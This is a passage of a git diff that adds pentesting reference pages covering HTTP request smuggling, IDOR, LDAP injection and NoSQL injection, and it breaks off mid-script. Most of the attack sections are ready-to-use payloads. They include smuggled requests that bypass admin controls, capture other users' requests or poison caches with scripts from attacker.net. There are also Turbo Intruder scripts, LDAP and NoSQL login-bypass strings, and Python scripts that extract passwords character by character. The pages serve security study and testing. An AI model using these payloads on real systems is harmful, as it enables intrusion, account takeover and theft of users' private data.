+Content-Length: 4  
+Connection: keep-alive  
+Transfer-Encoding: chunked  
+  
+7b  
+GET /404 HTTP/1.1  
+Host: vulnerable-website.com  
+Content-Type: application/x-www-form-urlencoded  
+Content-Length: 30  
+  
+x=  
+0`  
+  
+
+
+In this case the **reverse-proxy** will **send the hole request** to the **back-end** as the **`Transfer-encoding`** indicates so. But, the **back-end** is going to **process** only the **`7b\r\n`** \(4bytes\) as indicated in the `Content-Lenght` .Therefore, the next request will be the one starting by `GET /404 HTTP/1.1`
+
+_Note that even if the attack must end with a `0\r\n\r\n` the following request is going to be appended as extra values of the **x** parameter.  
+Also note that the Content-Length of the embedded request will indicate the length of the next request that is going to b appended to the **x** parameter. If it's too small, only a few bytes will be appended, and if to large \(bigger that the length of the next request\) and error will be thrown for the next request._
+
+### TE.TE vulnerabilities
+
+Here, the front-end and back-end servers both support the `Transfer-Encoding` header, but one of the servers can be induced not to process it by obfuscating the header in some way.  
+There are potentially endless ways to obfuscate the `Transfer-Encoding` header. For example:
+
+`Transfer-Encoding: xchunked  
+  
+Transfer-Encoding : chunked  
+  
+Transfer-Encoding: chunked  
+Transfer-Encoding: x  
+  
+Transfer-Encoding: chunked  
+Transfer-encoding: x  
+  
+Transfer-Encoding:[tab]chunked  
+  
+[space]Transfer-Encoding: chunked  
+  
+X: X[\n]Transfer-Encoding: chunked  
+  
+Transfer-Encoding  
+: chunked`
+
+Depending on the server \(reverse-proxy or backing\) that **stops processing** the **TE** header, you will find a **CL.TE vulnerability** or a **TE.CL vulnerability**.
+
+## Finding HTTP Request Smuggling
+
+### Finding CL.TE vulnerabilities using timing techniques
+
+If an application is vulnerable to the CL.TE variant of request smuggling, then sending a request like the following will often cause a time delay:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Transfer-Encoding: chunked  
+Connection: keep-alive  
+Content-Length: 4  
+  
+1  
+A  
+X`
+
+Since the front-end server uses the `Content-Length` header, it will forward only part of this request, omitting the `X`. The back-end server uses the `Transfer-Encoding` header, processes the first chunk, and then waits for the next chunk to arrive. This will cause an observable time delay.
+
+### Finding TE.CL vulnerabilities using timing techniques
+
+If an application is vulnerable to the TE.CL variant of request smuggling, then sending a request like the following will often cause a time delay:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Transfer-Encoding: chunked  
+Connection: keep-alive  
+Content-Length: 6  
+  
+0  
+  
+X`
+
+Since the front-end server uses the `Transfer-Encoding` header, it will forward only part of this request, omitting the `X`. The back-end server uses the `Content-Length` header, expects more content in the message body, and waits for the remaining content to arrive. This will cause an observable time delay.
+
+### Probing HTTP Request Smuggling vulnerabilities
+
+Once you have found that the **timing techniques are working** you need to **probe** that you can you can **alter others clients requests**.  
+The easiest way to do this is to try to poison your own requests, **make a request for `/` return a 404 for example**.  
+In the [Basic Examples](http-request-smuggling.md#basic-examples) we already saw `CL.TE` and `TE.CL` examples of how to poison a clients request to ask for `/404` provoking a 404 response when the client was asking for any other resource.
+
+#### **Notes**
+
+Some important considerations should be kept in mind when attempting to confirm request smuggling vulnerabilities via interference with other requests:
+
+* The "attack" request and the "normal" request should be sent to the server using different network connections. Sending both requests through the same connection won't prove that the vulnerability exists.
+* The "attack" request and the "normal" request should use the same URL and parameter names, as far as possible. This is because many modern applications route front-end requests to different back-end servers based on the URL and parameters. Using the same URL and parameters increases the chance that the requests will be processed by the same back-end server, which is essential for the attack to work.
+* When testing the "normal" request to detect any interference from the "attack" request, you are in a race with any other requests that the application is receiving at the same time, including those from other users. You should send the "normal" request immediately after the "attack" request. If the application is busy, you might need to perform multiple attempts to confirm the vulnerability.
+* In some applications, the front-end server functions as a load balancer, and forwards requests to different back-end systems according to some load balancing algorithm. If your "attack" and "normal" requests are forwarded to different back-end systems, then the attack will fail. This is an additional reason why you might need to try several times before a vulnerability can be confirmed.
+* If your attack succeeds in interfering with a subsequent request, but this wasn't the "normal" request that you sent to detect the interference, then this means that another application user was affected by your attack. If you continue performing the test, this could have a disruptive effect on other users, and you should exercise caution.
+
+## Abusing HTTP Request Smuggling
+
+### To bypass front-end security controls
+
+Some times the **front-end proxies will perform some security checks**. You can avoid them by abusing HTTP Request Smuggling as you will be able to **bypass the protections**. For example, in this example you **cannot access `/admin` from the outside** and the front-end proxy is checking that, but this **proxy isn't checking the embedded request**:
+
+#### CL.TE
+
+`POST / HTTP/1.1  
+Host: acb21fdd1f98c4f180c02944000100b5.web-security-academy.net  
+Cookie: session=xht3rUYoc83NfuZkuAp8sDxzf0AZIwQr  
+Connection: keep-alive  
+Content-Type: application/x-www-form-urlencoded  
+Content-Length: 67  
+Transfer-Encoding: chunked  
+  
+0  
+  
+GET /admin HTTP/1.1  
+Host: localhost  
+Content-Length: 10  
+  
+x=`
+
+#### TE.CL
+
+`POST / HTTP/1.1  
+Host: ace71f491f52696180f41ed100d000d4.web-security-academy.net  
+Cookie: session=Dpll5XYw4hNEu09dGccoTjHlFNx5QY1c  
+Content-Type: application/x-www-form-urlencoded  
+Connection: keep-alive  
+Content-Length: 4  
+Transfer-Encoding: chunked  
+2b  
+GET /admin HTTP/1.1  
+Host: localhost  
+a=x  
+0`  
+  
+
+
+### Revealing front-end request rewriting <a id="revealing-front-end-request-rewriting"></a>
+
+In many applications, the **front-end server performs some rewriting of requests** before they are forwarded to the back-end server, typically by adding some additional request headers.  
+One common thing to do is to **add to the request the header** `X-Forwarded-For: <IP of the client>` or some similar header so the back-end knows the IP of the client.  
+Sometimes, if you can **find which new values are appended** to the request you could be able to **bypass protections** and **access hidden information**/**endpoints**.
+
+For discovering how is the proxy rewriting the request you need to **find a POST parameter that the back-end will reflect it's value** on the response. Then, use this parameter the last one and use an exploit like this one:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Content-Length: 130  
+Connection: keep-alive  
+Transfer-Encoding: chunked  
+0  
+  
+POST /search HTTP/1.1  
+Host: vulnerable-website.com  
+Content-Type: application/x-www-form-urlencoded  
+Content-Length: 100  
+  
+search=`
+
+In this case the next request will be appended after `search=` which is also **the parameter whose value is going to be reflected** on the response, therefore it's going to **reflect the headers of the next request**.
+
+Note that **only the length indicated in the `Content-Length` header of the embedded request is going to be reflected**. If you use a low number, only a few bytes will be reflected, if you use a bigger number than the length of all the headers, then the embedded request will throw and error. Then, you should **start** with a **small number** and **increase** it until you see all you wanted to see.  
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+
+Finally note that in this attack we are still attacking ourselves to learn how the front-end proxy is rewriting the request.
+
+### Capturing other users' requests <a id="capturing-other-users-requests"></a>
+
+If you can find a POST request which is going to save the contents of one of the parameters you can append the following request as the value of that parameter in order to store the quest of the next client:
+
+`POST / HTTP/1.1  
+Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net  
+Content-Type: application/x-www-form-urlencoded  
+Content-Length: 319  
+Connection: keep-alive  
+Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi  
+Transfer-Encoding: chunked  
+  
+0  
+  
+POST /post/comment HTTP/1.1  
+Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net  
+Content-Length: 659  
+Content-Type: application/x-www-form-urlencoded  
+Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi  
+  
+csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=HACKTRICKS&email=email%40email.com&comment=`
+
+In this case, the value of the **parameter comment** is going to be **saved inside a comment** of a post in the page that is **publicly available**, so a **comment will appear with the content of the next request**.
+
+_One limitation with this technique is that it will generally only capture data up until the parameter delimiter that is applicable for the smuggled request. For URL-encoded form submissions, this will be the `&` character, meaning that the content that is stored from the victim user's request will end at the first `&`, which might even appear in the query string._
+
+Note also that this **technique is also exploitable with a TE.CL** vulnerability but the request must end with `search=\r\n0\r\n\r\n`. However, independently of the new line characters the values are going to be appended to the search parameter.
+
+### Using HTTP request smuggling to exploit reflected XSS
+
+If the web page is also **vulnerable to Reflected XSS**, you can abuse HTTP Request Smuggling to attack clients of the web. The exploitation of Reflected XSS from HTTP Request Smuggling have some advantages:
+
+* **It requires no interaction with victim users**
+* It can be used to **exploit** XSS behavior in parts of the request that **cannot be trivially controlled in a normal reflected XSS attack**, such as HTTP request headers.
+
+If a web is vulnerable to Reflected XSS on the User-Agent header you can use this payload to exploit it:
+
+`POST / HTTP/1.1  
+Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net  
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0  
+Cookie: session=Ro7YknOtbl3bxURHAAxZz84qj3PSMnSY  
+Transfer-Encoding: chunked  
+Connection: keep-alive  
+Content-Length: 213  
+Content-Type: application/x-www-form-urlencoded  
+  
+0  
+  
+GET /post?postId=2 HTTP/1.1  
+Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net  
+User-Agent: "><script>alert(1)</script>  
+Content-Length: 10  
+Content-Type: application/x-www-form-urlencoded  
+  
+A=`
+
+### Using HTTP request smuggling to turn an on-site redirect into an open redirect <a id="using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect"></a>
+
+Many applications perform on-site redirects from one URL to another and place the hostname from the request's `Host` header into the redirect URL. An example of this is the default behavior of Apache and IIS web servers, where a request for a folder without a trailing slash receives a redirect to the same folder including the trailing slash:
+
+`GET /home HTTP/1.1  
+Host: normal-website.com  
+  
+HTTP/1.1 301 Moved Permanently  
+Location: https://normal-website.com/home/`
+
+This behavior is normally considered harmless, but it can be exploited in a request smuggling attack to redirect other users to an external domain. For example:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Content-Length: 54  
+Connection: keep-alive  
+Transfer-Encoding: chunked  
+  
+0  
+  
+GET /home HTTP/1.1  
+Host: attacker-website.com  
+Foo: X`
+
+The smuggled request will trigger a redirect to the attacker's website, which will affect the next user's request that is processed by the back-end server. For example:
+
+`GET /home HTTP/1.1  
+Host: attacker-website.com  
+Foo: XGET /scripts/include.js HTTP/1.1  
+Host: vulnerable-website.com  
+  
+HTTP/1.1 301 Moved Permanently  
+Location: https://attacker-website.com/home/`
+
+Here, the user's request was for a JavaScript file that was imported by a page on the web site. The attacker can fully compromise the victim user by returning their own JavaScript in the response.
+
+### Using HTTP request smuggling to perform web cache poisoning <a id="using-http-request-smuggling-to-perform-web-cache-poisoning"></a>
+
+If any part of the **front-end infrastructure performs caching of content** \(generally for performance reasons\) the it **might be possible to poison that cache modifying the response of the server**.
+
+We have already see how to modify the expected returned value from the server to a 404 \(in the [Basic Examples](http-request-smuggling.md#basic-examples)\), in a similar way you could make the server return the content of /index.html when the poisoned request is asking for `/static/include.js` . This way, the content of the `/static/include.js` will be cached with the content of `/index.html` making `/static/include.js` inaccessible to the clients \(DoS?\).
+
+Notice this is even more interesting if you find some **Open Redirect** or some **on-site redirect to open redirect** \(last section\). Because, you could be able to **change the cache values** of `/static/include.js` with the **ones of a script controlled by you** \(making a **general XSS to all the clients** that try to download the new version of`/static/include.js`\).
+
+In this example it's going to be shown how you can exploit a **cache poisoning + on-site redirect to open redirect** to modify the contents of the cache of `/static/include.js` to **serve JS code controlled** by the attacker:
+
+`POST / HTTP/1.1  
+Host: vulnerable.net  
+Content-Type: application/x-www-form-urlencoded  
+Connection: keep-alive  
+Content-Length: 124  
+Transfer-Encoding: chunked  
+  
+0  
+  
+GET /post/next?postId=3 HTTP/1.1  
+Host: attacker.net  
+Content-Type: application/x-www-form-urlencoded  
+Content-Length: 10  
+  
+x=1`
+
+Note how the embedded request is asking for `/post/next?postId=3` This request is going to be redirected to `/post?postId=4` and **will use the value of the Host header** to indicate the domain. Therefore, you can **modify the Host header** to point the attackers server and the redirect will use that domain \(**on-site redirect to open redirect**\).
+
+Then, **after poisoning the socket**, you need to send a **GET request** to **`/static/include.js`**this request will be **poisoned** by the **on-site redirect to open redirect** request and will **grab the contents of the attacker controlled script**.
+
+The next time that somebody ask for `/static/include.js` the cached contents of the attackers script will be server \(general XSS\).
+
+### Using HTTP request smuggling to perform web cache deception <a id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
+
+> **What is the difference between web cache poisoning and web cache deception?**
+>
+> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
+> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
+
+In this variant, the attacker smuggles a request that returns some sensitive user-specific content. For example:
+
+`POST / HTTP/1.1  
+Host: vulnerable-website.com  
+Connection: keep-alive  
+Content-Length: 43  
+Transfer-Encoding: chunked  
+  
+0  
+  
+GET /private/messages HTTP/1.1  
+Foo: X`
+
+If the **poison reaches a client that was accessing some static content** like `/someimage.png` that was going to be **cached**. The contents of `/private/messages` of the victim will be cached in `/someimage.png` and the attacker will be able to steal them.  
+Note that the **attacker doesn't know which static content the victim was trying to access** so probably the best way to test this is to perform the attack, wait a few seconds and **load all** the static contents and **search for the private data**.
+
+## Turbo intruder scripts
+
+### CL.TE
+
+From [https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
+
+```python
+def queueRequests(target, wordlists):
+
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=5,
+                           requestsPerConnection=1,
+                           resumeSSL=False,
+                           timeout=10,
+                           pipeline=False,
+                           maxRetriesPerRequest=0,
+                           engine=Engine.THREADED,
+                           )
+    engine.start()
+
+    attack = '''POST / HTTP/1.1
+ Transfer-Encoding: chunked
+Host: xxx.com
+Content-Length: 35
+Foo: bar
+
+0
+
+GET /admin7 HTTP/1.1
+X-Foo: k'''
+
+    engine.queue(attack)
+
+    victim = '''GET / HTTP/1.1
+Host: xxx.com
+
+'''
+    for i in range(14):
+        engine.queue(victim)
+        time.sleep(0.05)
+
+def handleResponse(req, interesting):
+    table.add(req)
+```
+
+### TE.CL
+
+From: [https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
+
+```python
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=5,
+                           requestsPerConnection=1,
+                           resumeSSL=False,
+                           timeout=10,
+                           pipeline=False,
+                           maxRetriesPerRequest=0,
+                           engine=Engine.THREADED,
+                           )
+    engine.start()
+
+    attack = '''POST / HTTP/1.1
+Host: xxx.com
+Content-Length: 4
+Transfer-Encoding : chunked
+
+46
+POST /nothing HTTP/1.1
+Host: xxx.com
+Content-Length: 15
+
+kk
+0
+
+'''
+    engine.queue(attack)
+
+    victim = '''GET / HTTP/1.1
+Host: xxx.com
+
+'''
+    for i in range(14):
+        engine.queue(victim)
+        time.sleep(0.05)
+
+
+def handleResponse(req, interesting):
+    table.add(req)
+```
+
+## More info
+
+![](../.gitbook/assets/eki5edauuaaipik.jpg)
+
+[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104&ref_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
+
+## Tools
+
+* [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
+* [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
+
+## References
+
+* [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
+* [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
+* [https://portswigger.net/web-security/request-smuggling/exploiting](https://portswigger.net/web-security/request-smuggling/exploiting)
+* [https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4](https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4)
+* [https://github.com/haroonawanofficial/HTTP-Desync-Attack/](https://github.com/haroonawanofficial/HTTP-Desync-Attack/)
+* [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
+
diff --git a/pentesting-web/idor.md b/pentesting-web/idor.md
new file mode 100644
index 00000000..39965ea2
--- /dev/null
+++ b/pentesting-web/idor.md
@@ -0,0 +1,100 @@
+# IDOR
+
+**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)\*\*\*\*
+
+## Unsuspected places to look for IDORs <a id="8d15"></a>
+
+### Don’t ignore encoded and hashed IDs <a id="d6ce"></a>
+
+When faced with an encoded ID, it might be possible to decode the encoded ID using common encoding schemes.
+
+And if the application is using a hashed/ randomized ID, see if the ID is predictable. Sometimes applications use algorithms that produce insufficient entropy, and as such, the IDs can actually be predicted after careful analysis. In this case, try creating a few accounts to analyze how these IDs are created. You might be able to find a pattern that will allow you to predict IDs belonging to other users.
+
+Additionally, it might be possible to leak random or hashed IDs via another API endpoint, on other public pages in the application \(profile page of other users, etc\), or in a URL via referer.
+
+For example, once I found an API endpoint that allows users to retrieve detailed direct messages through a hashed conversation ID. The request kinda looks like this:
+
+```text
+GET /api_v1/messages?conversation_id=SOME_RANDOM_ID
+```
+
+This seems okay at first glance since the _conversation\_id_ is a long, random, alphanumeric sequence. But I later found that you can actually find a list of conversations for each user just by using their user ID!
+
+```text
+GET /api_v1/messages?user_id=ANOTHER_USERS_ID
+```
+
+This would return a list of _conversation\_ids_ belonging to that user. And the _user\_id_ is publicly available on each user’s profile page. Therefore, you can read any user’s messages by first obtaining their user\_id on their profile page, then retrieving a list of conversation\_ids belonging to that user, and finally loading the messages via the API endpoint /api\_v1/messages!
+
+### If you can’t guess it, try creating it <a id="b54f"></a>
+
+If the object reference IDs seem unpredictable, see if there is something you can do to manipulate the creation or linking process of these object IDs.
+
+### Offer the application an ID, even if it doesn’t ask for it <a id="9292"></a>
+
+If no IDs are used in the application generated request, try adding it to the request. Try appending _id, user\_id, message\_id_ or other object reference params and see if it makes a difference to the application’s behavior.
+
+For example, if this request displays all your direct messages:
+
+```text
+GET /api_v1/messages
+```
+
+What about this one? Would it display another user’s messages instead?
+
+```text
+GET /api_v1/messages?user_id=ANOTHER_USERS_ID
+```
+
+### HPP \(HTTP parameter pollution\) <a id="cb9a"></a>
+
+HPP vulnerabilities \(supplying multiple values for the same parameter\) can also lead to IDOR. Applications might not anticipate the user submitting multiple values for the same parameter and by doing so, you might be able to bypass the access control set forth on the endpoint.
+
+Although this seems to be rare and I’ve never seen it happen before, theoretically, it would look like this. If this request fails:
+
+```text
+GET /api_v1/messages?user_id=ANOTHER_USERS_ID
+```
+
+Try this:
+
+```text
+GET /api_v1/messages?user_id=YOUR_USER_ID&user_id=ANOTHER_USERS_ID
+```
+
+Or this:
+
+```text
+GET /api_v1/messages?user_id=ANOTHER_USERS_ID&user_id=YOUR_USER_ID
+```
+
+Or provide the parameters as a list:
+
+```text
+GET /api_v1/messages?user_ids[]=YOUR_USER_ID&user_ids[]=ANOTHER_USERS_ID
+```
+
+### Blind IDORs <a id="7639"></a>
+
+Sometimes endpoints susceptible to IDOR don’t respond with the leaked information directly. They might lead the application to leak information elsewhere instead: in export files, emails and maybe even text alerts.
+
+### Change the request method <a id="6597"></a>
+
+If one request method doesn’t work, there are plenty of others that you can try instead: GET, POST, PUT, DELETE, PATCH…
+
+A common trick that works is substituting POST for PUT or vice versa: the same access controls might not have been implemented!
+
+### Change the requested file type <a id="8f78"></a>
+
+Sometimes, switching around the file type of the requested file may lead to the server processing authorization differently. For example, try adding .json to the end of the request URL and see what happens.
+
+## How to increase the impact of IDORs <a id="45b0"></a>
+
+### Critical IDORs first <a id="71f7"></a>
+
+Always look for IDORs in critical functionalities first. Both write and read based IDORs can be of high impact.
+
+In terms of state-changing \(write\) IDORs, password reset, password change, account recovery IDORs often have the highest business impact. \(Say, as compared to a “change email subscription settings” IDOR.\)
+
+As for non-state-changing \(read\) IDORs, look for functionalities that handle the sensitive information in the application. For example, look for functionalities that handle direct messages, sensitive user information, and private content. Consider which functionalities on the application makes use of this information and look for IDORs accordingly.
+
diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md
new file mode 100644
index 00000000..275bbf28
--- /dev/null
+++ b/pentesting-web/ldap-injection.md
@@ -0,0 +1,191 @@
+# LDAP Injection
+
+## **LDAP**
+
+LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
+
+**Ports 389 y 636**
+
+{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}
+
+**Filter** = \( filtercomp \)  
+**Filtercomp** = and / or / not / item  
+**And** = & filterlist  
+**Or** = \|filterlist  
+**Not** = ! filter  
+**Filterlist** = 1\*filter  
+**Item**= simple / present / substring  
+**Simple** = attr filtertype assertionvalue  
+**Filtertype** =   _'='  /  '~=' / '&gt;=' / '&lt;='_  
+**Present** = attr = \*  
+**Substring** = attr ”=” \[initial\] \* \[final\]  
+**Initial** = assertionvalue  
+**Final** = assertionvalue  
+**\(&\)** = Absolute TRUE  
+**\(\|\)** = Absolute FALSE
+
+For example:  
+\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)  
+\(&\(objectClass=user\)\(uid=\*\)\)
+
+You can access to the database, and this can content information of a lot of different types.
+
+The backups of LDAP uses the extension _ldif_
+
+**OpenLDAP**: If 2 filters arrive, only executes the first one.  
+**ADAM or Microsoft LDS**: With 2 filters they throw an error.  
+**SunOne Directory Server 5.0**: Execute both filters.
+
+**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
+
+The filter has to start with: _&_ or _\|_  
+Example: _\(&\(directory=val1\)\(folder=public\)\)_
+
+\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)  
+VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
+
+Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
+
+## Login Bypass
+
+LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
+
+```bash
+user=*
+password=*
+--> (&(user=*)(password=*))
+# The asterisks are great in LDAPi
+```
+
+```bash
+user=*)(&
+password=*)(&
+--> (&(user=*)(&)(password=*)(&))
+```
+
+```bash
+user=*)(|(&
+pass=pwd)
+--> (&(user=*)(|(&)(pass=pwd))
+```
+
+```bash
+user=*)(|(password=*
+password=test)
+--> (&(user=*)(|(password=*)(password=test))
+```
+
+```bash
+user=*))%00
+pass=any
+--> (&(user=*))%00 --> Nothing more is executed
+```
+
+```bash
+user=admin)(&)
+password=pwd
+--> (&(user=admin)(&))(password=pwd) #Can through an error
+```
+
+```bash
+username = admin)(!(&(|
+pass = any))
+--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
+```
+
+```bash
+username=*
+password=*)(&
+--> (&(user=*)(password=*)(&))
+```
+
+```bash
+username=admin))(|(|
+password=any
+--> (&(uid=admin)) (| (|) (webpassword=any))
+```
+
+[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20injection/Intruders/LDAP_FUZZ.txt)  
+[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20injection/Intruders/LDAP_attributes.txt)  
+[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
+
+## Blind LDAP Injection
+
+You can iterate over the ascii letters, digits and symbols:
+
+```bash
+(&(sn=administrator)(password=*))    : OK
+(&(sn=administrator)(password=A*))   : KO
+(&(sn=administrator)(password=B*))   : KO
+...
+(&(sn=administrator)(password=M*))   : OK
+(&(sn=administrator)(password=MA*))  : KO
+(&(sn=administrator)(password=MB*))  : KO
+...
+```
+
+## Scripts
+
+### **Discover valid LDAP fields**
+
+LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.**
+
+```python
+#!/usr/bin/python3
+import requests
+import string
+from time import sleep
+import sys
+
+proxy = { "http": "localhost:8080" }
+url = "http://10.10.10.10/login.php"
+alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
+
+attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
+
+for attribute in attributes: #Extract all attributes
+    value = ""
+    finish = False
+    while not finish:
+        for char in alphabet: #In each possition test each possible printable char
+            query = f"*)({attribute}={value}{char}*"
+            data = {'login':query, 'password':'bla'}
+            r = requests.post(url, data=data, proxies=proxy)
+            sys.stdout.write(f"\r{attribute}: {value}{char}")
+            #sleep(0.5) #Avoid brute-force bans
+            if "Cannot login" in r.text:
+                value += str(char)
+                break
+            
+            if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
+                finish = True
+                print()
+```
+
+### **Special Blind LDAP Injection \(without "\*"\)**
+
+```python
+#!/usr/bin/python3
+
+import requests, string
+alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
+
+flag = ""
+for i in range(50):
+    print("[i] Looking for number " + str(i))
+    for char in alphabet:
+        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
+        if ("TRUE CONDITION" in r.text):
+            flag += char
+            print("[+] Flag: " + flag)
+            break
+```
+
+## Google Dorks
+
+```bash
+intitle:"phpLDAPadmin" inurl:cmd.php
+```
+
+[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20injection)
+
diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
new file mode 100644
index 00000000..f556a24c
--- /dev/null
+++ b/pentesting-web/nosql-injection.md
@@ -0,0 +1,209 @@
+# NoSQL injection
+
+NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+
+## Exploit
+
+In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName\]=foo._
+
+The exploits are based in adding an **Operator**:
+
+```bash
+username[$ne]=1$password[$ne]=1 #<Not Equals>
+username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
+username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
+username[$eq]=admin$password[$ne]=1 #<Equals>
+username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
+username[$ne]=admin&pass[$gt]=s #<Greater Than>
+username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
+{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
+```
+
+### Basic authentication bypass
+
+**Using not equal \($ne\) or greater \($gt\)**
+
+```bash
+#in URL
+username[$ne]=toto&password[$ne]=toto
+username[$exists]=true&password[$exists]=true
+
+#in JSON
+{"username": {"$ne": null}, "password": {"$ne": null} }
+{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
+{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
+```
+
+### **SQL - Mongo**
+
+```text
+Normal sql: ' or 1=1-- -
+Mongo sql: ' || 1==1//    or    ' || 1==1%00
+```
+
+### Extract **length** information
+
+```bash
+username[$ne]=toto&password[$regex]=.{1}
+username[$ne]=toto&password[$regex]=.{3}
+# True if the length equals 1,3...
+```
+
+### Extract **data** information
+
+```text
+in URL (if length == 3)
+username[$ne]=toto&password[$regex]=a.{2}
+username[$ne]=toto&password[$regex]=b.{2}
+...
+username[$ne]=toto&password[$regex]=m.{2}
+username[$ne]=toto&password[$regex]=md.{1}
+username[$ne]=toto&password[$regex]=mdp
+
+username[$ne]=toto&password[$regex]=m.*
+username[$ne]=toto&password[$regex]=md.*
+
+in JSON
+{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
+{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
+{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
+```
+
+### **SQL - Mongo**
+
+```text
+/?search=admin' && this.password%00 --> Check if the field password exists
+/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
+/?search=admin' && this.password && this.password.match(/^a.*$/)%00
+/?search=admin' && this.password && this.password.match(/^b.*$/)%00
+/?search=admin' && this.password && this.password.match(/^c.*$/)%00
+...
+/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
+...
+/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
+```
+
+## Blind NoSQL
+
+```python
+import requests, string
+
+alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
+
+flag = ""
+for i in range(21):
+    print("[i] Looking for char number "+str(i+1))
+    for char in alphabet:
+        r = requests.get("http://chall.com?param=^"+flag+char)
+        if ("<TRUE>" in r.text):
+            flag += char
+            print("[+] Flag: "+flag)
+            break
+```
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username="admin"
+password=""
+
+while True:
+    for c in string.printable:
